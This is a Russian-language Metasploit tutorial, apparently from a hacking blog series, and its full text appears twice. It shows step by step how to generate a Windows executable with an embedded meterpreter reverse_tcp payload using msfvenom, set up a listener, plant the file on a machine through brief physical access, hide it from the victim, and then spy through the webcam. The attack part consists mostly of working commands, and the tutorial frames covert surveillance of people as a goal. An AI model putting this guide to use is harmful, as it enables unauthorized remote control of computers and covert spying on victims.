Добро пожаловать обратно, мои начинающие кибервоины!
Многое из того, что мы сделали в этой серии «Основы Metasploit», позволяет нам эксплуатировать и контролировать удалённую систему в любой точке планеты Земля (или, по крайней мере, любую машину, подключенную к Интернету на планете Земля). В некоторых случаях нам может понадобиться контролировать систему, к которой у нас есть временный физический доступ. Это может быть машина в нашем офисе, в нашем доме, общежитии или другом доступном месте. Уверен, вы можете представить себе множество ситуаций, в которых это может быть правдой, например, когда государственный шпион получает физический доступ к конфиденциальной компьютерной системе всего на мгновение. Или, в более обыденном случае, вы можете превратить этот безобидный на вид ноутбук в «камеру-няню», пока вы в городе. В каждом случае на самом деле очень просто и легко внедрить полезную нагрузку meterpreter в систему, имея доступ примерно за 30 секунд и флеш-накопитель.
Многие из вас писали мне, ссылаясь на хакерские приключения Кевина Митника, описанные в его многочисленных книгах. В некоторых случаях Митник с помощью социальной инженерии получает физический доступ к компьютерным системам компании или учреждения и таким образом получает контроль над компьютером. Взлом, который я собираюсь здесь продемонстрировать, очень похож. Кроме того, вы, возможно, помните, в сериале «Мистер Робот» Анджела получает кратковременный физический доступ к компьютерной системе своего начальника и точно так же может узнать его пароль с помощью резиновой уточки и мимикаца.
В этом уроке мы сделаем то же самое. Мы создадим исполняемый файл со встроенным meterpreter, и всё, что нам нужно сделать для управления системой, — это скопировать исполняемый файл в целевую систему и нажать кнопку!
Шаг №1: Запустите Kali и откройте Metasploit
Первый шаг, конечно, — запустить систему Kali и запустить Metasploit.
kali > msfconsole
Шаг №2: создание исполняемого файла с помощью msfvenom
Теперь нам нужно создать исполняемый файл для Windows и встроить в него Meterpreter. Это можно сделать с помощью msfvenom (подробнее о msfvenom можно узнать здесь ).
msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=4444 -f exe >вредоносное ПО
В данном случае я создал exe-файл и назвал его «вредоносным ПО». Вы можете назвать свой файл как-нибудь менее зловеще и более скрытно.
Шаг №3 Скопируйте exe-файл на флеш-накопитель
Затем скопируйте файл malware.exe на флеш-накопитель. Для этого используйте команду cp в Linux или перетащите файл на флеш-накопитель через проводник.
Шаг №4 Запустите Handler на вашем Kali
Прежде чем передать исполняемый файл целевой системе, необходимо запустить обработчик в Metasploit. Это просто TCP-слушатель, ожидающий обратного вызова и подключения от полезной нагрузки.
msf > использовать multi/handler
msf > установить полезную нагрузку windows/meterpreter/reverse_tcp
msf > установить LHOST 192.168.1.103
msf > установить LPORT 4444
msf> эксплойт
Теперь этот обработчик будет ждать, пока вредоносная программа со встроенной полезной нагрузкой снова подключится к нему через порт 4444.
Шаг №5 Скопируйте exe-файл в целевую систему
Затем скопируйте вредоносное ПО с флеш-накопителя на целевую систему. Здесь я скопировал его на рабочий стол для демонстрации, но для большей скрытности вам, вероятно, стоит скопировать его в папку, которую жертва вряд ли откроет и увидит.
Шаг №5. Запустите Exe.
Далее, поскольку это исполняемый файл, вы можете просто дважды щёлкнуть по нему, чтобы запустить его. Это должно одновременно запустить meterpreter. В идеале, вам следует запустить его от имени администратора, чтобы у meterpreter были права системного администратора. Для этого щёлкните правой кнопкой мыши и выберите «Запуск от имени администратора».
Шаг №6 Станьте владельцем системы!
Как только вредоносная программа запустится на целевой системе, она подключится к нашей системе Kali и откроет на ней meterpreter! Теперь эта система принадлежит вам!
Шаг №7: Веселье после эксплуатации!
Теперь, когда система у вас, вы можете делать практически всё, что захотите. Для начала давайте посмотрим, какие процессы запущены.
meterpreter > ps
Как видите, процесс malware.exe запущен на целевой системе. Если бы жертва запустила диспетчер задач Windows, она бы увидела то же самое.
Если бы мы хотели использовать эту систему в качестве камеры-няни или для слежки за объектом, мы могли бы включить веб-камеру. Сначала нужно проверить, есть ли веб-камера.
meterpreter > webcam_list
Если доступна веб-камера, мы можем сделать снимок, введя:
meterpreter> webcam_snap
Снимок сохраняется в нашем каталоге /root. Чтобы просмотреть снимок, нужно просто открыть браузер и перейти к файлу.
Теперь, когда у нас есть целевая система, мы можем делать практически всё, что захотим! Больше идей по пост-эксплуатации вы найдёте в «Основах Metasploit», часть 15 , а также в моём списке команд и скриптов meterpreter , которые можно использовать на целевой системе.
Заключение
Если вы можете получить физический доступ практически к любой системе, игра окончена ! Имея физический доступ всего лишь около 30 секунд, вы можете внедрить в систему полезную нагрузку Meterpreter и делать с ней практически всё, что захотите, включая управление микрофоном, веб-камерой и даже кейлоггер. Надеюсь, это демонстрирует один из самых важных, но недооценённых принципов информационной безопасности — физическую безопасность.
Многое из того, что мы сделали в этой серии «Основы Metasploit», позволяет нам эксплуатировать и контролировать удалённую систему в любой точке планеты Земля (или, по крайней мере, любую машину, подключенную к Интернету на планете Земля). В некоторых случаях нам может понадобиться контролировать систему, к которой у нас есть временный физический доступ. Это может быть машина в нашем офисе, в нашем доме, общежитии или другом доступном месте. Уверен, вы можете представить себе множество ситуаций, в которых это может быть правдой, например, когда государственный шпион получает физический доступ к конфиденциальной компьютерной системе всего на мгновение. Или, в более обыденном случае, вы можете превратить этот безобидный на вид ноутбук в «камеру-няню», пока вы в городе. В каждом случае на самом деле очень просто и легко внедрить полезную нагрузку meterpreter в систему, имея доступ примерно за 30 секунд и флеш-накопитель.
Многие из вас писали мне, ссылаясь на хакерские приключения Кевина Митника, описанные в его многочисленных книгах. В некоторых случаях Митник с помощью социальной инженерии получает физический доступ к компьютерным системам компании или учреждения и таким образом получает контроль над компьютером. Взлом, который я собираюсь здесь продемонстрировать, очень похож. Кроме того, вы, возможно, помните, в сериале «Мистер Робот» Анджела получает кратковременный физический доступ к компьютерной системе своего начальника и точно так же может узнать его пароль с помощью резиновой уточки и мимикаца.
В этом уроке мы сделаем то же самое. Мы создадим исполняемый файл со встроенным meterpreter, и всё, что нам нужно сделать для управления системой, — это скопировать исполняемый файл в целевую систему и нажать кнопку!
Шаг №1: Запустите Kali и откройте Metasploit
Первый шаг, конечно, — запустить систему Kali и запустить Metasploit.
kali > msfconsole
Шаг №2: создание исполняемого файла с помощью msfvenom
Теперь нам нужно создать исполняемый файл для Windows и встроить в него Meterpreter. Это можно сделать с помощью msfvenom (подробнее о msfvenom можно узнать здесь ).
msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=4444 -f exe >вредоносное ПО
В данном случае я создал exe-файл и назвал его «вредоносным ПО». Вы можете назвать свой файл как-нибудь менее зловеще и более скрытно.
Шаг №3 Скопируйте exe-файл на флеш-накопитель
Затем скопируйте файл malware.exe на флеш-накопитель. Для этого используйте команду cp в Linux или перетащите файл на флеш-накопитель через проводник.
Шаг №4 Запустите Handler на вашем Kali
Прежде чем передать исполняемый файл целевой системе, необходимо запустить обработчик в Metasploit. Это просто TCP-слушатель, ожидающий обратного вызова и подключения от полезной нагрузки.
msf > использовать multi/handler
msf > установить полезную нагрузку windows/meterpreter/reverse_tcp
msf > установить LHOST 192.168.1.103
msf > установить LPORT 4444
msf> эксплойт
Теперь этот обработчик будет ждать, пока вредоносная программа со встроенной полезной нагрузкой снова подключится к нему через порт 4444.
Шаг №5 Скопируйте exe-файл в целевую систему
Затем скопируйте вредоносное ПО с флеш-накопителя на целевую систему. Здесь я скопировал его на рабочий стол для демонстрации, но для большей скрытности вам, вероятно, стоит скопировать его в папку, которую жертва вряд ли откроет и увидит.
Шаг №5. Запустите Exe.
Далее, поскольку это исполняемый файл, вы можете просто дважды щёлкнуть по нему, чтобы запустить его. Это должно одновременно запустить meterpreter. В идеале, вам следует запустить его от имени администратора, чтобы у meterpreter были права системного администратора. Для этого щёлкните правой кнопкой мыши и выберите «Запуск от имени администратора».
Шаг №6 Станьте владельцем системы!
Как только вредоносная программа запустится на целевой системе, она подключится к нашей системе Kali и откроет на ней meterpreter! Теперь эта система принадлежит вам!
Шаг №7: Веселье после эксплуатации!
Теперь, когда система у вас, вы можете делать практически всё, что захотите. Для начала давайте посмотрим, какие процессы запущены.
meterpreter > ps
Если бы мы хотели использовать эту систему в качестве камеры-няни или для слежки за объектом, мы могли бы включить веб-камеру. Сначала нужно проверить, есть ли веб-камера.
meterpreter > webcam_list
Если доступна веб-камера, мы можем сделать снимок, введя:
meterpreter> webcam_snap
Снимок сохраняется в нашем каталоге /root. Чтобы просмотреть снимок, нужно просто открыть браузер и перейти к файлу.
Теперь, когда у нас есть целевая система, мы можем делать практически всё, что захотим! Больше идей по пост-эксплуатации вы найдёте в «Основах Metasploit», часть 15 , а также в моём списке команд и скриптов meterpreter , которые можно использовать на целевой системе.
Заключение
Если вы можете получить физический доступ практически к любой системе, игра окончена ! Имея физический доступ всего лишь около 30 секунд, вы можете внедрить в систему полезную нагрузку Meterpreter и делать с ней практически всё, что захотите, включая управление микрофоном, веб-камерой и даже кейлоггер. Надеюсь, это демонстрирует один из самых важных, но недооценённых принципов информационной безопасности — физическую безопасность.